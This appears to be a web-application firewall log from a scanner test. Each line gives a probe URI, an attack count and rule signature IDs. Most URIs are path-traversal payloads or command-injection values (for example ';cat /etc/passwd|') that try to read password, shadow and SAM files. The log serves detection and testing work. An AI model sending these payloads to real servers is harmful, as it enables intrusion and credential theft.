Packet [796]	Uri [/web/192.168.1.101.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [797]	Uri [/web/192.168.1.101.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [802]	Uri [/web/192_168_1_101.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [803]	Uri [/web/192_168_1_101.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [804]	Uri [/web/192.168.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [805]	Uri [/web/192.168.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [832]	Uri [/web/backup.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [833]	Uri [/web/backup.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [858]	Uri [/web/backup.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [859]	Uri [/web/backup.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [860]	Uri [/web/192.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [861]	Uri [/web/192.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [862]	Uri [/web/192.168.1.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [863]	Uri [/web/192.168.1.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [872]	Uri [/web/192.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [873]	Uri [/web/192.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [874]	Uri [/web/192.168.1.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [875]	Uri [/web/192.168.1.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [876]	Uri [/web/site.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [877]	Uri [/web/site.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [880]	Uri [/web/192.168.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [881]	Uri [/web/192.168.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [884]	Uri [/web/168.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [885]	Uri [/web/168.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [898]	Uri [/web/168.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [899]	Uri [/web/168.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [914]	Uri [/web/192168.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [915]	Uri [/web/192168.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [970]	Uri [/web/1921681.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [971]	Uri [/web/1921681.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [996]	Uri [/web/1921681101.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [997]	Uri [/web/1921681101.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [998]	Uri [/web/101.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [999]	Uri [/web/101.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [1004]	Uri [/web/192.168.1.101.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [1005]	Uri [/web/192.168.1.101.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [1008]	Uri [/web/101.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [1009]	Uri [/web/101.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [1010]	Uri [/web/192_168_1_101.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [1011]	Uri [/web/192_168_1_101.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [1074]	Uri [/web/1.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [1075]	Uri [/web/1.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [1086]	Uri [/web/1.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [1087]	Uri [/web/1.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [1094]	Uri [/web/site.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [1095]	Uri [/web/site.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [1096]	Uri [/web/1921681.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [1097]	Uri [/web/1921681.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [1187]	Uri [/web/../../../../../../../../../../../../etc/shadow]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [1201]	Uri [/web/scripts/samples/details.idc]	Nattacks [1 ]	Signatures	[920440]
Packet [1202]	Uri [/web/index.php?chemin=..%2F..%2F..%2F..%2F..%2F..%2F..%2F%2Fetc]	Nattacks [4 ]	Signatures	[930100]	[930110]	[930110]	[942460]
Packet [1205]	Uri [/web/admin-serv/tasks/configuration/ViewLog?file=passwd&num=5000&str=&directories=admin-serv%2Flogs%2f..%2f..%2f..%2f..%2f..%2f..%2fetc&id=admin-serv]	Nattacks [5 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[942460]
Packet [1206]	Uri [/web/3rdparty/phpMyAdmin/db_details_importdocsql.php?submit_show=true&do=import&docpath=../]	Nattacks [1 ]	Signatures	[930110]
Packet [1207]	Uri [/web/phpMyAdmin/db_details_importdocsql.php?submit_show=true&do=import&docpath=../]	Nattacks [1 ]	Signatures	[930110]
Packet [1208]	Uri [/web/3rdparty/phpmyadmin/db_details_importdocsql.php?submit_show=true&do=import&docpath=../]	Nattacks [1 ]	Signatures	[930110]
Packet [1209]	Uri [/web/phpmyadmin/db_details_importdocsql.php?submit_show=true&do=import&docpath=../]	Nattacks [1 ]	Signatures	[930110]
Packet [1210]	Uri [/web/pma/db_details_importdocsql.php?submit_show=true&do=import&docpath=../]	Nattacks [1 ]	Signatures	[930110]
Packet [1211]	Uri [/web/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [1212]	Uri [/web/PSUser/PSCOErrPage.htm?errPagePath=/etc/passwd]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [1213]	Uri [/web/..\..\..\..\..\..\temp\temp.class]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [1214]	Uri [/web/../../../../../../../../../../etc/passwd]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [1215]	Uri [/web/.../.../.../.../.../.../.../.../.../boot.ini]	Nattacks [1 ]	Signatures	[920440]
Packet [1217]	Uri [/web/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini]	Nattacks [3 ]	Signatures	[920440]	[930100]	[930110]
Packet [1218]	Uri [/web/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [1219]	Uri [/web/ca//\\../\\../\\../\\../\\../\\../\\windows/\\win.ini]	Nattacks [4 ]	Signatures	[920440]	[930100]	[930110]	[930110]
Packet [1220]	Uri [/web/ca/..\\..\\..\\..\\..\\..\\/\\etc/\\passwd]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [1221]	Uri [/web/ca/..\\..\\..\\..\\..\\..\\..\\..\\winnt/\\win.ini]	Nattacks [3 ]	Signatures	[920440]	[930100]	[930110]
Packet [1224]	Uri [/web/ext.ini.%00.txt]	Nattacks [3 ]	Signatures	[920270]	[920271]	[920272]
Packet [1232]	Uri [/web/scripts/samples/search/qfullhit.htw]	Nattacks [1 ]	Signatures	[920440]
Packet [1233]	Uri [/web/scripts/samples/search/qsumrhit.htw]	Nattacks [1 ]	Signatures	[920440]
Packet [1234]	Uri [/web/mYXRD.htw]	Nattacks [1 ]	Signatures	[920440]
Packet [1235]	Uri [/web/file/../../../../../../../../etc/]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [1236]	Uri [/web/basilix.php3?request_id[DUMMY]=../../../../etc/passwd&RequestID=DUMMY&username=sec&password=secu]	Nattacks [7 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [1237]	Uri [/web/index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc]	Nattacks [4 ]	Signatures	[930100]	[930110]	[930110]	[942460]
Packet [1238]	Uri [/web/index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc/&view=passwd]	Nattacks [4 ]	Signatures	[930100]	[930110]	[930110]	[942460]
Packet [1240]	Uri [/web/cgi-bin/pfdisplay.cgi?../../../../../../etc/passwd]	Nattacks [4 ]	Signatures	[930100]	[930110]	[930120]	[932160]
Packet [1241]	Uri [/web../../../../../../../../../../etc/*]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [1242]	Uri [/web../../../../../../../../../../etc/passw*]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [1243]	Uri [/web/bytehoard/index.php?infolder=../../../../../../../../../../../etc/]	Nattacks [4 ]	Signatures	[930100]	[930110]	[930110]	[942460]
Packet [1244]	Uri [/web/OpenFile.aspx?file=../../../../../../../../../../boot.ini]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[942460]
Packet [1246]	Uri [/web/scripts/cphost.dll]	Nattacks [1 ]	Signatures	[920440]
Packet [1247]	Uri [/web////../../data/config/microsrv.cfg]	Nattacks [3 ]	Signatures	[920440]	[930100]	[930110]
Packet [1248]	Uri [/web////////../../../../../../etc/passwd]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [1249]	Uri [/web/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini]	Nattacks [3 ]	Signatures	[920440]	[930100]	[930110]
Packet [1250]	Uri [/web/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini]	Nattacks [3 ]	Signatures	[920440]	[930100]	[930110]
Packet [1253]	Uri [/web/mylog.html?screen=/etc/passwd]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [1254]	Uri [/web/mylog.phtml?screen=/etc/passwd]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [1257]	Uri [/web/php/mylog.html?screen=/etc/passwd]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [1258]	Uri [/web/php/mylog.phtml?screen=/etc/passwd]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [1259]	Uri [/web/fi?/etc/passwd]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [1260]	Uri [/web/directory.php?dir=%3Bcat%20/etc/passwd]	Nattacks [4 ]	Signatures	[930120]	[932100]	[932160]	[942110]
Packet [1262]	Uri [/web/content/base/build/explorer/none.php?/etc/passwd]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [1272]	Uri [/web/shop/normal_html.cgi?file=../../../../../../etc/issue%00]	Nattacks [10 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930120]	[942460]
Packet [1273]	Uri [/web/shop/normal_html.cgi?file=;cat%20/etc/passwd|]	Nattacks [4 ]	Signatures	[930120]	[932100]	[932160]	[942110]
Packet [1274]	Uri [/web/shop/normal_html.cgi?file=|cat%20/etc/passwd|]	Nattacks [3 ]	Signatures	[930120]	[932100]	[932160]
Packet [1275]	Uri [/web/shop/member_html.cgi?file=;cat%20/etc/passwd|]	Nattacks [4 ]	Signatures	[930120]	[932100]	[932160]	[942110]
Packet [1276]	Uri [/web/shop/member_html.cgi?file=|cat%20/etc/passwd|]	Nattacks [3 ]	Signatures	[930120]	[932100]	[932160]
Packet [1277]	Uri [/web/boilerplate.asp?NFuse_Template=.../.../.../.../.../.../.../.../.../boot.ini&NFuse_CurrentFolder=/]	Nattacks [2 ]	Signatures	[930120]	[942460]
Packet [1278]	Uri [/web/?pattern=/etc/*&sort=name]	Nattacks [2 ]	Signatures	[932190]	[942440]
Packet [1279]	Uri [/web/images/?pattern=/etc/*&sort=name]	Nattacks [2 ]	Signatures	[932190]	[942440]
Packet [1280]	Uri [/web/3rdparty/phpMyAdmin/export.php?what=../../../../../../../../../../../../etc/passwd%00]	Nattacks [12 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [1281]	Uri [/web/phpMyAdmin/export.php?what=../../../../../../../../../../../../etc/passwd%00]	Nattacks [12 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [1282]	Uri [/web/3rdparty/phpmyadmin/export.php?what=../../../../../../../../../../../../etc/passwd%00]	Nattacks [11 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [1283]	Uri [/web/phpmyadmin/export.php?what=../../../../../../../../../../../../etc/passwd%00]	Nattacks [11 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [1284]	Uri [/web/pma/export.php?what=../../../../../../../../../../../../etc/passwd%00]	Nattacks [11 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [1285]	Uri [/web/dcforum/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd%00]	Nattacks [11 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [1286]	Uri [/web/internal.sws?../../../../../../../../winnt/win.ini]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [1287]	Uri [/web/internal.sws?../../../../../../../../winnt/win.ini]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [1290]	Uri [/web/viewimg.php?path=../../../../../../../../../../etc/passwd&form=1&var=1]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [1300]	Uri [/web/shoutbox.php?conf=../../../../../../../etc/passwd]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [1301]	Uri [/web/.%252e/.%252e/.%252e/winnt/boot.ini]	Nattacks [3 ]	Signatures	[920440]	[930100]	[930110]
Packet [1309]	Uri [/web/lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/viewcode.jse+httplist+httplist/../../../../../system/autoexec.ncf]	Nattacks [3 ]	Signatures	[930100]	[930110]	[930110]
Packet [1310]	Uri [/web/opendir.php?/etc/passwd]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [1311]	Uri [/web/opendir.php?requesturl=/etc/passwd]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [1312]	Uri [/web/cgi-bin/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%57%49%4E%4E%54%2F%73%79%73%74%65%6D%33%32%2Fping.exe%20127.0.0.1]	Nattacks [3 ]	Signatures	[930100]	[930110]	[930110]
Packet [1313]	Uri [/web/cgi-bin/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%57%69%6E%64%6F%77%73%2Fping.exe%20127.0.0.1]	Nattacks [3 ]	Signatures	[930100]	[930110]	[930110]
Packet [1314]	Uri [/web/..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cboot.ini]	Nattacks [3 ]	Signatures	[920440]	[930100]	[930110]
Packet [1315]	Uri [/web/..%5C..%5C..%5C..%5C..%5C..%5C/winnt/win.ini]	Nattacks [3 ]	Signatures	[920440]	[930100]	[930110]
Packet [1316]	Uri [/web/gallery/index.php?include=../../../../../../../../../etc/passwd]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [1317]	Uri [/web/modules.php?set_albumName=album01&id=aaw&op=modload&name=gallery&file=index&include=../../../../../../../../../etc/passwd]	Nattacks [7 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [1318]	Uri [/web/phprocketaddin/?page=../../../../../../../../../../etc/passwd]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [1319]	Uri [/web/msadc/Samples/selector/showcode.asp?source=/msadc/Samples/../../../../../../../../../winnt/win.ini]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930110]	[942460]
Packet [1320]	Uri [/web/pls/sample/admin_/help/..%255cplsql.conf]	Nattacks [3 ]	Signatures	[920440]	[930100]	[930110]
Packet [1321]	Uri [/web/..%252f..%252f..%252f..%252f..%252f../windows/repair/sam]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [1322]	Uri [/web/..%252f..%252f..%252f..%252f..%252f../winnt/repair/sam]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [1323]	Uri [/web/..%252f..%252f..%252f..%252f..%252f../winnt/repair/sam._]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [1324]	Uri [/web/..%255c..%255c..%255c..%255c..%255c../windows/repair/sam]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [1325]	Uri [/web/..%255c..%255c..%255c..%255c..%255c../winnt/repair/sam]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [1326]	Uri [/web/..%255c..%255c..%255c..%255c..%255c../winnt/repair/sam._]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [1327]	Uri [/web/..%2F..%2F..%2F..%2F..%2F../windows/repair/sam]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [1328]	Uri [/web/..%2F..%2F..%2F..%2F..%2F../winnt/repair/sam]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [1329]	Uri [/web/..%2F..%2F..%2F..%2F..%2F../winnt/repair/sam._]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [1330]	Uri [/web/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini]	Nattacks [3 ]	Signatures	[920440]	[930100]	[930110]
Packet [1331]	Uri [/web/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini]	Nattacks [3 ]	Signatures	[920440]	[930100]	[930110]
Packet [1332]	Uri [/web/iissamples/exair/search/query.idq?CiTemplate=../../../../../../../../../../winnt/win.ini]	Nattacks [6 ]	Signatures	[920440]	[930100]	[930110]	[930110]	[930110]	[942460]
Packet [1333]	Uri [/web/iissamples/exair/search/search.idq?CiTemplate=../../../../../../../../../../winnt/win.ini]	Nattacks [6 ]	Signatures	[920440]	[930100]	[930110]	[930110]	[930110]	[942460]
Packet [1334]	Uri [/web/sdk/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/etc/vmware/hostd/vmInventory.xml]	Nattacks [3 ]	Signatures	[930100]	[930110]	[930110]
Packet [1335]	Uri [/web/services/Version?xsd=../../../../../../../../../../../etc/passwd]	Nattacks [7 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [1336]	Uri [/web/axis/services/Version?xsd=../../../../../../../../../../../etc/passwd]	Nattacks [7 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [1337]	Uri [/web/axis2/services/Version?xsd=../../../../../../../../../../../etc/passwd]	Nattacks [7 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [1338]	Uri [/web/imcws/services/Version?xsd=../../../../../../../../../../../etc/passwd]	Nattacks [7 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [1339]	Uri [/web/WebServiceImpl/services/Version?xsd=../../../../../../../../../../../etc/passwd]	Nattacks [7 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [1340]	Uri [/web/dswsbobje/services/Version?xsd=../../../../../../../../../../../etc/passwd]	Nattacks [7 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [1341]	Uri [/web/ws/services/Version?xsd=../../../../../../../../../../../etc/passwd]	Nattacks [7 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [1342]	Uri [/web/../../windows/dvr2.ini]	Nattacks [3 ]	Signatures	[920440]	[930100]	[930110]
Packet [1343]	Uri [/web/htdocs/../../../../../../../../../../../etc/passwd]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [1344]	Uri [/web/help/../../../../../../../../../../../../../../../../etc/shadow]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [1348]	Uri [/web/horde/util/barcode.php?type=../../../../../../../../../../../etc/./passwd%00]	Nattacks [11 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [1359]	Uri [/web/wp-content/themes/twentyeleven/images/headers/server.php?filesrc=/etc/hosts]	Nattacks [1 ]	Signatures	[930120]
Packet [1360]	Uri [/web/wordpresswp-content/themes/twentyeleven/images/headers/server.php?filesrc=/etc/hosts]	Nattacks [1 ]	Signatures	[930120]
Packet [1361]	Uri [/web/wp-includes/Requests/Utility/content-post.php?filesrc=/etc/hosts]	Nattacks [1 ]	Signatures	[930120]
Packet [1362]	Uri [/web/wordpresswp-includes/Requests/Utility/content-post.php?filesrc=/etc/hosts]	Nattacks [1 ]	Signatures	[930120]
Packet [1363]	Uri [/web/wp-includes/js/tinymce/themes/modern/Meuhy.php?filesrc=/etc/hosts]	Nattacks [1 ]	Signatures	[930120]
Packet [1364]	Uri [/web/wordpresswp-includes/js/tinymce/themes/modern/Meuhy.php?filesrc=/etc/hosts]	Nattacks [1 ]	Signatures	[930120]
Packet [1369]	Uri [/web/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD=]	Nattacks [7 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930110]	[930110]	[942460]
# N. packets [1369], [351] with alerts, N. Alerts [1176]
